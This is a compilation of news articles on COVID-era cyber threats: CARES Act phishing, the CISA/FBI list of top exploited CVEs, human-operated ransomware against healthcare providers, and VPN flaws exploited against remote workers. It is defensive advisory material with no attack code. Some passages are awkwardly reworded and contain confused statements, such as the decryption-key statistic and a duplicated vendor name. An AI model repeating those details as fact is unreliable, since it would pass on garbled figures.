Because of the CARES Act, there is $2 trillion funding available to help businesses and people negatively impacted by the COVID-19 pandemic, which can help to decrease the financial load by means of economic impact payments to eligible Americans. Cybercriminals are using CARES Act payments as a bait in phishing attacks to get personal and financial data and attempt to redirect CARES Act payments. All U.S. citizens are advised to look out for scams associated with the CARES Act and COVID-19.

The U.S. Government reports that a lot of cybercriminal groups are utilizing stimulus-themed baits in phishing emails and SMS to get sensitive data like bank account data. Financial establishments were asked to tell their clients to exercise good cybersecurity procedures and to check for dubious account use and creation.

Criminals are making use of CARES Act-inspired email messages and sites to get sensitive data, propagate malware, and acquire access to computer networks. They include topics such as loan and grant programs, personal checks, economic stimulus, or other topics related to the CARES Act. These CARES Act associated cybercriminal initiatives could support a broad range of follow-on activities that could harm the implementation of the CARES Act.

Threat actors might try to interrupt the operations of agencies accountable for the implementation of the CARES Act, such as using ransomware to disrupt the flow of CARES Act funds and to extort the victims’ money. Federal, state, local and tribal organizations are being told to examine their loan processing, payment and banking systems and strengthen security to stop attacks.

Overseas threat actors were found to be processing fake claims for COVID-19 relief money, including one Nigerian business email compromise (BEC) group identified to have submitted over 200 fake claims for CARES Act payments and unemployment benefits. The team, called Scattered Canary, has been presenting several claims via state unemployment sites to get payments utilizing information ripped off in W-2 phishing attacks. The group has sent in a minimum of 174 fraudulent claims with the Washington state and over 12 claims with the state of Massachusetts. Around 8 states were targeted so far.

The U.S. Government has been sharing threat intelligence and cybersecurity practices to help disturb and prevent criminal activity. The U.S. Secret Service is presently concentrated on looking into operations to determine people taking advantage of the crisis to make sure they face justice and retrieve cash lost because of fraud.

The IRS has told taxpayers that it will not start contact with taxpayers by means of email, SMS, or social media sites to require personal and financial data including bank account numbers, PINs and credit card data. The IRS has cautioned Americans that copycat websites that could be created to get sensitive data and to carefully verify any domain for transposed letters or mismatched SSL certificates. The IRS is just utilizing www.irs.gov and the IRS-run webpage, https://www.freefilefillableforms.com/.

All people in America were informed to be wary and keep track of their financial accounts for indicators of bogus activity and to report incidents of phishing attacks and other frauds to the proper authorities. They should also inform their employer when they think they fall victim to a scam and disclosed sensitive data regarding their company.

The advisory, Avoid Scams Related To Economic Payments, COVID-19, are available on this page.

CISA and FBI Reveal Top 10 List of Exploited Vulnerabilities

The FBI and the Cybersecurity and Infrastructure Security Agency recently published a joint public service announcement describing the top ten most exploited vulnerabilities from 2016 to 2019. Sophisticated nation-state hackers are exploiting these vulnerabilities to attack companies both in the public and private industries to access their systems to steal sensitive information.

Hacking groups connected to China, Russia, Iran, and North Korea widely exploit the vulnerabilities in the list. Their cyber actors still perform attacks taking advantage of the vulnerabilities, although patches were already available to correct the vulnerabilities. In certain instances, patches were available for over 5 years, but a number of companies have yet to apply the patches.

If attackers exploit the vulnerabilities included in the top 10 list, fewer resources are required as compared to zero-day exploits. That means they could conduct more attacks. If companies apply the patches to resolve the top 10 vulnerabilities, it will force nation-state hackers to create new exploits that will restrict their ability to perform attacks.

CISA and FBI explain in the announcement that a determined campaign to patch the vulnerabilities would bring in friction into foreign adversaries’ operational tradecraft and compel them to create or obtain exploits that are more expensive and less extensively effective. A determined patching campaign will additionally strengthen network security by concentrating hard to find defensive solutions on the detected activities of foreign adversaries.

CISA and the FBI expect the list will direct companies to prioritize patching and urge all companies to spend more time and means into patching and create a program that will update all system patching moving forward.

Top 10 Consistently Exploited Vulnerabilities

The consistently exploited vulnerabilities in the top ten list include vulnerabilities in Adobe Flash Player, Microsoft SharePoint, Microsoft Windows, Microsoft Office, Microsoft .NET Framework, Apache Struts, and Drupal. From the ten listed vulnerabilities, the majority of nation-state hacking groups have focused on only three vulnerabilities that concern Microsoft’s OLE technology – CVE-2017-11882, CVE-2012-0158 and CVE-2017-0199. Microsoft’s Object Linking and Embedding (OLE) enables the embedding of content from other applications in Word Documents. The number 4 most frequently exploited vulnerability is CVE-2017-5638, which is found in the Apache Struts web framework. These vulnerabilities were exploited to set up a variety of different malware payloads such as Loki, Pony/FAREIT, FormBook, FINSPY, LATENTBOT, JexBos, Dridex, China Chopper, DOGCALL, FinFisher, WingBird, and Kitty.

  1. Vulnerability CVE-2017-11882 affects Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016 Products
  2. Vulnerability CVE-2017-0199 affects Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1
  3. Vulnerability CVE-2017-5638 affects Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1
  4. Vulnerability CVE-2012-0158 affects Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; BizTalk Server 2002 SP1; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; Visual Basic 6.0; and Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2;
  5. Vulnerability CVE-2019-0604 affects Microsoft SharePoint
  6. Vulnerability CVE-2017-0143 affects Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT
  7. Vulnerability CVE-2018-4878 affects Adobe Flash Player before 28.0.0.161
  8. Vulnerability CVE-2017-8759 affects Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7
  9. Vulnerability CVE-2015-1641 affects Microsoft Word 2007 SP3, Office 2010 SP2, Word 2010 SP2, Word 2013 SP1, Word 2013 RT SP1, Word for Mac 2011, Office Compatibility Pack SP3, Word Automation Services on SharePoint Server 2010 SP2 and 2013 SP1, and Office Web Apps Server 2010 SP2 and 2013 SP1
  10. Vulnerability CVE-2018-7600 affects Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1

    A warning was also issued regarding two vulnerabilities – Citrix vulnerability CVE-2019-19781 and Pulse Secure VPN vulnerability CVE-2019-11510 – which were exploited in the 2020 attacks. Nation-state hackers and cybercriminal groups exploit these vulnerabilities that both involve Virtual Private Network (VPN) solutions.

The haste to use cloud collaboration services like Microsoft Office 365 to enable employees to do remote work because of COVID-19 has provided hackers new alternatives to attacking companies. Rash deployments of these options have resulted in oversights in security settings that made them susceptible to attack. Cybersecurity weaknesses are likewise being exploited, including poor employee training with regards to phishing and social engineering. Insufficiency of system recovery and backup plans has additionally put companies in danger of ransomware attacks.

Guidance for Healthcare Organizations on Avoiding and Identifying Human-Operated Ransomware Attacks

There was an increase in human-operated ransomware attacks on healthcare providers and critical infrastructure during the COVID-19 crisis. Many attacks have happened on healthcare providers in the last weeks, which include Parkview Medical Center, Brandywine Counselling and Community Services and ExecuPharm.

A lot of ransomware attacks are programmed and begin with a phishing email. As soon as ransomware is installed, it usually starts encryption within one hour. Human-operated ransomware attacks are not so. Access is acquired to systems a few weeks or months prior to the deployment of ransomware. At that time, the attackers get credentials, go laterally, and gather and exfiltrate information before the ransomware encrypts files.

The attackers could stay dormant in systems for a few months before deploying the ransomware to make the most disruption. The COVID-19 crisis is the best time to deploy ransomware on healthcare providers and other institutions engaged in responding to COVID-19, since there is a greater likelihood that the ransom is going to be paid to make sure a fast recovery.

According to Microsoft’s data, in April’s first two weeks, many attacks were performed by a variety of advanced cybercriminal groups on healthcare organizations, research and pharmaceutical companies, medical billing firms, and dealers to the healthcare sector, alongside attacks on educational software companies, producers, government organizations, and aid organizations.

It was observed that human-operated ransomware attacks use the following 10 ransomware variants: Maze, RobbinHood, PonyFinal, Valet Loader, REvil (Sodinokibi), NetWalker, RagnarLocker, Paradise, LockBit and MedusaLocker. Though using different ransomware variants, the attacks typically happen in a similar manner. First, the attackers access the systems; Second, they steal credentials, proceed laterally, exfiltrate sensitive information, build persistence, prior to deploying the ransomware payload.

Microsoft has provided information about the way attackers access systems to help network defenders strengthen their defenses and prohibit attacks. Even though there are a few possible ways of assaulting an organization, the threat actors normally use similar methods to acquire access.

One of the often used methods of attack is via Remote Desktop Protocol or Virtual Desktop endpoints which lack multi-factor authentication, frequently using stolen credentials or via brute force strategies to guess weak passwords. With no multi-factor authentication, the attackers can use stolen credentials to access systems. Because valid credentials are employed, network defenders are not able to know the attackers accessing their networks.

Flaws in internet-facing systems are often exploited. Examples are misconfigured web servers, backup servers, EHRs, and systems management servers. Unpatched vulnerabilities are likewise frequently exploited. Some of the April 2020 attacks involved taking advantage of the Pulse Secure VPN flaw, CVE-2019-11510 and the Citrix Application Delivery Controller (ADC) vulnerability, CVE-2019-19781. Flaws in unsupported operating systems are additionally exploited. To prevent attacks, it is important to update operating systems and apply patches immediately after release.

These attacks do not deploy ransomware quickly to get a fast payout. All of the threat actors take their time to get administrative credentials and go laterally with the purpose of penetrating an organization’s entire system, including inboxes, EHRs, endpoints, and applications. Most of the attacks entailed data exfiltration with the intention to sell data for profit or to use it for nefarious purposes, or to compel organizations to pay the ransom.

The time frame from the preliminary compromise to the deployment of ransomware offers network defenders a chance to detect and prevent the attacks. Though threat actors attempt to cover their activity, it is likely to determine their activities when they move laterally. There should be network defenders that check activities that may signify an ongoing attack and other penetration-testing programs. Security logs must be inspected to find signs of tampering. Registry alterations and suspicious access to the Local Security Authority Subsystem Service (LSASS) should also be identified.

Microsoft also provides comprehensive advice on fortifying security to stop attacks and the guidelines for investigation, the seclusion of compromised endpoints, and restoration in case an attack is discovered.

Ransomware Attackers Likely to Target Small to Medium-Sized Healthcare Organizations

A new RiskIQ report stated that ransomware groups are focusing their campaigns on smaller healthcare companies and clinics. Healthcare companies having less than 500 workers account for 70% of all reported healthcare ransomware attacks that succeeded since 2016.

RiskIQ’s studied 127 healthcare ransomware attacks and revealed that attacks from 2016 to 2019 increased by 35%. 51% of ransomware attacks were on hospitals and healthcare centers, 24% were on medical practices, and 17% were on health and wellness facilities.

Smaller healthcare providers most likely have less effective cybersecurity defenses than larger healthcare providers. RiskIQ states that 85% of SME hospitals lack a qualified IT security officer, thus gaps in security are not addressed. Paying the ransom is the more likely action in order to stay clear of the expensive downtime due to an attack. If the ransom is not paid, recovery often takes several weeks.

A Perfect Storm of New Targets and Methods

According to the RiskIQ intelligence brief “Ransomware in the Health Sector 2020,” there’s “a perfect storm of new targets and methods” because of the digital trend in healthcare. However, recent incidents exposed the healthcare sector to a lot more attacks. The 2019 Novel Coronavirus outbreak has spurred healthcare companies to come up with big changes. Almost instantaneously, there was decentralization of workforces and business operations. Hence, the protection gaps widened and visibility into attack surfaces decreased.

A number of ransomware groups have stated their intention not to attack healthcare providers throughout the COVID-19 public health emergency. However, a few groups would not do the same. It is easier to attack nowadays and they’re taking advantage of the situation. Cybercriminals are taking advantage of coronavirus problems, therefore, there’s a surge in malicious online activities that will likely affect healthcare amenities and COVID-19 responders.

Ransom Payment is Not a Guarantee of File Recovery

16% of healthcare ransomware attack victims claimed they paid ransom money to obtain the file decryption keys. The average ransom payment associated with those attacks was $59,000. Although paying the ransom is a solution, the FBI does not recommend it because it only promotes more attacks and the recovery of files is not 100%. In fact, a Wall Street Journal article mentioned that less than 50% of the decryption keys are not working, therefore some data loss is unavoidable even after paying the ransom. There were also instances that the attackers required another payment after paying the initial before providing the decryption keys. Paying a ransom additionally communicates a message to ransomware gangs that this target is very likely to pay if attacked, and so the healthcare provider might be targeted again by the attacker or others.

Ransomware gangs utilize a number of ways to access healthcare networks to install ransomware. One way is to use spam email to fool the healthcare employee into clicking malicious url links that download ransomware or opening email attachments that contain ransomware downloaders. Software vulnerabilities, particularly in Remote Desktop Protocol, are often exploited. Because a great number of employees are now using healthcare networks remotely through Virtual Private Networks (VPNs), ransomware gangs are also targeting VPN vulnerabilities. A number of vulnerabilities were identified in VPN facilities during the past year. Though patches are available to resolve flaws, they are usually not employed.

Action Steps to Minimize Risk and Stop Ransomware Attacks

Be sure to make backups regularly so that files can be recovered when an attack occurs. However, the backups do not guarantee data restoration. A number of threat gangs are performing manual ransomware attacks and use up a lot of time in network access prior to deploying ransomware. In addition, sometimes the attackers insert their ransomware even into backup systems to encrypt backups also.

RiskIQ recommends healthcare providers to store the created backups offline, or on other networks. Encryption of saved data is likewise essential. There was a growth in information stealing before ransomware deployment. When information is coded, even though it is stolen the attackers cannot access the information.

RiskIQ highlights the value of having an incident response strategy, because this is going to help make sure attacks are mitigated immediately to lessen damages. It is also very important to apply patches quickly.

During the COVID-19 crisis, make sure that all digital assets connecting to an external organization are monitored and secured, because attackers are looking for these gadgets.

It is furthermore crucial to get the workforce ready and train the employees to recognize threats like phishing attacks. Phishing simulation exercises could help to cut down susceptibility to ransomware attacks. IT groups must also be updated on the most recent attack trends that constantly change.

Cybercriminals Targeting Remote Employees Throughout the COVID-19 Crisis

The COVID-19 outbreak has made it necessary for a lot of people to self-quarantine. Organizations are under growing pressure to allow their workers to work at home when possible. Although these steps are required to keep individuals safe and prevent infection, having a lot of workers working remotely heightens cyber risk. Whenever people work at home and link to work networks remotely utilizing portable electronic gadgets, the attack surface increases substantially and new vulnerabilities are brought in that attackers could exploit. With attacks aimed towards remote workers growing, it is essential to make sure that cybersecurity guidelines for securing remote workers are followed to decrease risk.

Phishing Campaigns Aimed towards Remote Employees

Cybercriminals are currently taking advantage of the coronavirus crisis and are utilizing COVID-19 and coronavirus-inspired baits in phishing and social engineering attacks so as to steal account credentials and spread malware. The first primary coronavirus-inspired phishing and malware spread campaigns were discovered at the start of January and the amount of malicious emails has increased considerably in the subsequent weeks. Phishing attacks will most likely increase as cybercriminals attempt to steal remote access credentials and employ it for weaponized email attacks that propagate malware.

Campaigns aimed towards remote employees have additionally lately been discovered. One such campaign notifies remote personnel to positive COVID-19 tests withinside their company. The messages imitate their employer and claim to have information about emergency procedures that were enforced, which remote employees are advised to open, look over and print out. Upon opening the attachments and allowing content will prompt a malware download. Security experts have additionally discovered a rise in domains being utilized for driving malware attacks.

VPN Vulnerabilities Exploitation

In the past year, a number of critical vulnerabilities were discovered in the Virtual Private Network (VPN) solutions which are utilized by remote employees for secure connection to their company networks. Pulse Connect Secure and Pulse Policy Secure gateways and FortiGuard and FortiGuard solutions were found to have vulnerabilities. Although patches were issued to fix the vulnerabilities, a lot of organizations did not use the patches because the solutions were being used 24 hours a day. APT groups grabbed the opportunity and exploited the vulnerabilities to access the networks of companies. Today, with a lot of employees utilizing VPNs and working from their homes, attacks are growing once more.

A large number of businesses are currently utilizing VPN services, teleconferencing options, and other remote access methods for the first time, and have needed to use the solutions quickly. Web and email services which were just accessed within the company have now been reconfigured to make sure it permits external access. Initially, those internal services were open to the internet. The rate at which the adjustments were made to allow access for telecommuting workers suggests that businesses were unable to examine completely and make sure that security is buttoned down.

CISA Warns of Exploitation of Vulnerabilities in VPNs and Campaigns Aimed Towards Remote Employees

To avert the spread of the coronavirus, a lot of companies are enabling their employees to do work from home. Although this measure is essential for lowering the risk of being infected with Coronavirus Disease 2019 (COVID-19), working from home brings other problems.

So as to defend against cyberattacks, remote network connection must be used with enterprise-class virtual private networks (VPN) solutions. VPNs protect the connection between the device of a user and the network, permitting the accessing and sharing of healthcare data securely.

Although VPNs will enhance security, a lot of VPN solutions have vulnerabilities that cybercriminals could exploit. In case of exploitation of those vulnerabilities, sensitive information may be intercepted, and an attacker can even assume control of impacted systems. Cybercriminals are looking for vulnerabilities in VPNs to take advantage of, and having more remote employees due to the coronavirus offers them even more victims to attack.

The dangers connected with VPNs and the growing number of remote employees due to the coronavirus has made the Department of Homeland Security’s Cybersecurity Infrastructure and Security Agency (CISA) to give an advisory to companies to boost VPN security and follow cybersecurity controls to defend against cyberattacks.

A number of vulnerabilities were found in common VPN solutions in the past year, which include VPN applications from Palo Alto Networks, Pulse Secure, and FortiGuard. Although there were patches available to deal with the vulnerabilities, a lot of companies didn’t update their software program to the most recent version. The inability to patch does away with the security provided by the VPN.

In January 2020, there’s a campaign detected aimed towards the CVE-2019-11510 vulnerability or remote code execution vulnerability in Pulse Secure Connect and Pulse Policy Secure to deploy REvil ransomware. By taking advantage of the vulnerability, an attacker can possibly access all active users and get their credentials in plaintext and implement arbitrary commands on VPN clients if they hook up to the server. Pulse Secure released a patch to fix the vulnerability on April 24, 2019, however, 9 months afterward, a lot of businesses continue to use vulnerable VPN versions.

Updating VPNs may be hard since they are generally in use 24 hours a day; nevertheless, it is important that updates are employed because of the high possibility that unpatched vulnerabilities can be exploited. CISA is encouraging all businesses to make certain to prioritize VPN patches.

It is additionally essential to be sure that users just could access to systems which are crucial to carrying out their job tasks. Making sure remote workers are given low-level privileges will lessen the problems that could be created in case their credentials are exposed. IT teams have to likewise intensify tracking of their systems and examining access records to determine possible compromises.

CISA has additionally cautioned about the growing incidents of phishing attacks aimed towards remote workers to acquire VPN credentials. Setting up email security solutions are necessary to catch these communications before they’re sent. Multifactor authentication ought to be integrated for remote access to avoid the use of compromised credentials. CISA alerts that businesses that do not implement MFA are going to be at a higher risk from phishing attacks.

IT teams likewise must ensure their systems can handle the higher number of remote personnel. CISA warns that businesses may discover they just have a few VPN connections and if they are all being used certain users won’t be able to access the systems to do telework.

The HHS’ Centers for Medicare and Medicaid Services (CMS) has extended Medicare telehealth benefits to assist in the struggle against the COVID-19 and the HHS’ Office for Civil Rights has declared it is going to use implementation prudence with regards to telehealth. This is going to enable more healthcare employees to work remotely throughout the upcoming weeks. It is consequently necessary that VPN guidelines are adopted.